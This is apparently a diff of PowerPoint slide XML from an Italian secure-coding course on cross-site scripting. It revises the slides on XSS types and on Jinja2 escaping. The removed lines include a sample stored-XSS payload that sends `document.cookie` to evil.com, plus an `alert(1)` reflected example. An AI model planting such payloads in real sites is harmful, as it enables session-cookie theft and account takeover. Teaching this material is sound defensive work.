-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>(cookie sessione, dati form, azioni a nome utente)</a:t>
+              <a:t>→ ha accesso a cookie sessione, dati form, può agire come l'utente</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6539,7 +8625,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="6473952"/>
-            <a:ext cx="7315200" cy="320040"/>
+            <a:ext cx="7315200" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6560,7 +8646,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi</a:t>
+              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi · 2024/2025</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6574,7 +8660,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="10515600" y="6473952"/>
-            <a:ext cx="1188720" cy="320040"/>
+            <a:ext cx="1188720" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6704,7 +8790,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="640080" y="1005840"/>
+            <a:off x="640080" y="1097280"/>
             <a:ext cx="10972800" cy="5029200"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -6722,6 +8808,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6747,6 +8836,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6764,7 +8856,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>  Esempio: /cerca?q=&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
+              <a:t>  Vittima: chi clicca il link malevolo</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -6772,6 +8864,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6789,7 +8884,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>  Vittima: chi clicca il link malevolo</a:t>
+              <a:t/>
             </a:r>
           </a:p>
           <a:p>
@@ -6797,6 +8892,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6814,7 +8912,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t/>
+              <a:t>STORED — il payload è salvato nel DB (commenti, post)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -6822,6 +8920,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6839,7 +8940,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>STORED — il payload è salvato nel DB (commenti, post)</a:t>
+              <a:t>  Vittima: chiunque visita la pagina (più grave)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -6847,6 +8948,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6864,7 +8968,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>  Vittima: chiunque visita la pagina (più grave)</a:t>
+              <a:t/>
             </a:r>
           </a:p>
           <a:p>
@@ -6872,6 +8976,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6889,7 +8996,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t/>
+              <a:t>DOM-BASED — JS della pagina prende valore da location.hash</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -6897,31 +9004,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>DOM-BASED — JS della pagina prende valore da location.hash</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6988,7 +9073,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="6473952"/>
-            <a:ext cx="7315200" cy="320040"/>
+            <a:ext cx="7315200" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7009,7 +9094,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi</a:t>
+              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi · 2024/2025</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -7023,7 +9108,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="10515600" y="6473952"/>
-            <a:ext cx="1188720" cy="320040"/>
+            <a:ext cx="1188720" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7119,7 +9204,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="164592"/>
-            <a:ext cx="10058400" cy="502920"/>
+            <a:ext cx="10972800" cy="502920"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7140,54 +9225,35 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Esempio: Stored XSS letale</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="Rectangle 3"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="9875520" y="164592"/>
-            <a:ext cx="2103120" cy="457200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="E63946"/>
-          </a:solidFill>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+              <a:t>Flusso di un attacco XSS Stored</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="Picture 3" descr="cap5_xss_flow.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="640080" y="1097280"/>
+            <a:ext cx="10881360" cy="4572000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="5" name="TextBox 4"/>
@@ -7196,88 +9262,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="9875520" y="182880"/>
-            <a:ext cx="2103120" cy="457200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:r>
-              <a:rPr sz="1200" b="1" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="FFFFFF"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>🚩 ANTI-PATTERN</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="Rectangle 5"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="457200" y="1097280"/>
-            <a:ext cx="11247120" cy="4572000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="F1F4F8"/>
-          </a:solidFill>
-          <a:ln>
-            <a:solidFill>
-              <a:srgbClr val="E63946"/>
-            </a:solidFill>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="TextBox 6"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="640080" y="1280160"/>
-            <a:ext cx="10972800" cy="4206240"/>
+            <a:off x="457200" y="5852160"/>
+            <a:ext cx="11247120" cy="365760"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7290,189 +9276,22 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># Commento postato dall'attaccante:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>&lt;script&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>  fetch('https://evil.com/?c=' + document.cookie)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>&lt;/script&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t/>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># Cosa succede quando un altro utente visita la pagina:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># 1. Il browser scarica il commento</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># 2. Trova il tag &lt;script&gt;, lo esegue</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># 3. Lo script invia il cookie di sessione della VITTIMA all'attaccante</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># 4. L'attaccante usa quel cookie → account takeover</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t/>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># Senza chiedere mai la password.</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="TextBox 7"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="457200" y="5852160"/>
-            <a:ext cx="11247120" cy="457200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="1" i="1">
-                <a:solidFill>
-                  <a:srgbClr val="E63946"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>⚠  Per questo HttpOnly sui cookie di sessione è critico</a:t>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="1300" b="0" i="1">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>Dal commento malevolo al furto del cookie di sessione</a:t>
             </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:cxnSp>
         <p:nvCxnSpPr>
-          <p:cNvPr id="9" name="Connector 8"/>
+          <p:cNvPr id="6" name="Connector 5"/>
           <p:cNvCxnSpPr/>
           <p:nvPr/>
         </p:nvCxnSpPr>
@@ -7507,14 +9326,14 @@
       </p:cxnSp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="10" name="TextBox 9"/>
+          <p:cNvPr id="7" name="TextBox 6"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="6473952"/>
-            <a:ext cx="7315200" cy="320040"/>
+            <a:ext cx="7315200" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7535,21 +9354,21 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="11" name="TextBox 10"/>
+              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi · 2024/2025</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="TextBox 7"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="10515600" y="6473952"/>
-            <a:ext cx="1188720" cy="320040"/>
+            <a:ext cx="1188720" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7645,7 +9464,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="164592"/>
-            <a:ext cx="10058400" cy="502920"/>
+            <a:ext cx="9144000" cy="502920"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7660,30 +9479,32 @@
           <a:p>
             <a:pPr algn="l"/>
             <a:r>
-              <a:rPr sz="2400" b="1" i="0">
+              <a:rPr sz="2200" b="1" i="0">
                 <a:solidFill>
                   <a:srgbClr val="FFFFFF"/>
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>La correzione: escape automatico (Jinja2)</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="Rectangle 3"/>
+              <a:t>Difesa: escape automatico (Jinja2)</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="9875520" y="164592"/>
-            <a:ext cx="2103120" cy="457200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
+            <a:off x="9784080" y="164592"/>
+            <a:ext cx="2194560" cy="457200"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst>
+              <a:gd name="adj" fmla="val 8000"/>
+            </a:avLst>
           </a:prstGeom>
           <a:solidFill>
             <a:srgbClr val="06A77D"/>
@@ -7722,8 +9543,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="9875520" y="182880"/>
-            <a:ext cx="2103120" cy="457200"/>
+            <a:off x="9784080" y="164592"/>
+            <a:ext cx="2194560" cy="457200"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7758,18 +9579,16 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="1097280"/>
-            <a:ext cx="11247120" cy="4572000"/>
+            <a:ext cx="11247120" cy="365760"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
           <a:solidFill>
-            <a:srgbClr val="F1F4F8"/>
+            <a:srgbClr val="2D2D37"/>
           </a:solidFill>
           <a:ln>
-            <a:solidFill>
-              <a:srgbClr val="06A77D"/>
-            </a:solidFill>
+            <a:noFill/>
           </a:ln>
         </p:spPr>
         <p:style>
@@ -7796,14 +9615,730 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="7" name="TextBox 6"/>
+          <p:cNvPr id="7" name="Oval 6"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="594360" y="1216152"/>
+            <a:ext cx="118872" cy="118872"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="FF5F56"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="Oval 7"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="777240" y="1216152"/>
+            <a:ext cx="118872" cy="118872"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="FFBD2E"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="Oval 8"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="960120" y="1216152"/>
+            <a:ext cx="118872" cy="118872"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="27C93F"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="10" name="TextBox 9"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="640080" y="1280160"/>
-            <a:ext cx="10972800" cy="4206240"/>
+            <a:off x="1371600" y="1161288"/>
+            <a:ext cx="5486400" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1000" b="0" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="CBD0D8"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>  app.py  —  jinja</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Rectangle 10"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1463040"/>
+            <a:ext cx="11247120" cy="4206240"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="1E1E28"/>
+          </a:solidFill>
+          <a:ln w="19050">
+            <a:solidFill>
+              <a:srgbClr val="06A77D"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="12" name="Rectangle 11"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1463040"/>
+            <a:ext cx="457200" cy="4206240"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="24242E"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="TextBox 12"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1051560" y="1600200"/>
+            <a:ext cx="10607040" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
